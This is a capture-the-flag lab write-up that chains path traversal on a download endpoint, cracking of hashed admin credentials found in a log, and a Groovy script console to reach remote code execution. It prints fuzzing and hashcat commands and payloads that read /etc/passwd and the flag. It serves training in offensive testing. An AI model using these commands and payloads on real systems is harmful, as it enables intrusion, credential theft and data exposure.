Path Traversal to RCE: Bug Bounty Write-Up POC
Path Traversal to RCE: Bug Bounty Write-Up POC
Introduction
Bug bounty hunting is all about persistence and creativity. This write-up documents my approach to a CTF lab that simulates a real-world vulnerability, inspired by this $40,000 bounty write-up by Abdullah Nawaf and Orwa Atyat. In this challenge, I exploited a path traversal vulnerability to escalate to remote code execution (RCE) on ev3spph9.eu2.ctfio.com.
Reconnaissance & Discovery
Target: ev3spph9.eu2.ctfio.com
Tools Used:
nmapfor port scanning:nmap -p- ev3spph9.eu2.ctfio.com
ffuffor directory fuzzing:ffuf -u http://ev3spph9.eu2.ctfio.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobusterfor additional enumeration:gobuster dir -u https://ev3spph9.eu2.ctfio.com -w /usr/share/wordlists/dirb/common.txtOutput:
/admin (Status: 302) [Size: 0] [--> /admin/faces/jsf/login.xhtml]
I found an admin panel at http://ev3spph9.eu2.ctfio.com/admin/faces/jsf/login.xhtml and a /download/ endpoint that hinted at file retrieval functionality.
Exploiting Path Traversal
Fuzzing revealed the vulnerable filename parameter:
wfuzz -c -z file,/usr/share/wordlists/common.txt --hh=404 "http://ev3spph9.eu2.ctfio.com/admin/download?filename=FUZZ"
This allowed me to read files like /WEB-INF/web.xml, revealing internal endpoints.
Credential Discovery & Admin Access
A log file at /admin/incident-report contained hashed credentials. Extracting and cracking them:
curl -O http://ev3spph9.eu2.ctfio.com/admin/incident-report
unzip incident-report-*.zip
cat incident.log
Extracted hashes were cracked using hashcat and Crackstation:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Logging in as admin at /admin/faces/jsf/login.xhtml provided access to a script execution console (export_step2.xhtml).
Achieving RCE
The console allowed executing system commands:
I tried these:
println "id".execute().text
println "cat /flag.txt".execute().text
print "id".execute().text
print "cat /etc/passwd".execute().text
return ["id".execute().text, "cat /flag.txt".execute().text]Since output wasn't directly displayed, I checked logs:
curl -O http://ev3spph9.eu2.ctfio.com:8443/admin/incident-report
unzip incident-report-*.zip
cat incident.log
Executing:
print "cat /flag.txt".execute().textSuccessfully retrieved the flag!
Key Takeaways
- Chaining bugs—a small vulnerability can lead to full compromise.
- Check logs for output when commands don’t return results.
- Persistence wins—keep testing different angles.
Conclusion
By combining multiple issues, I escalated from path traversal to RCE. This lab reinforced the importance of exploring beyond the initial vulnerability for maximum impact.
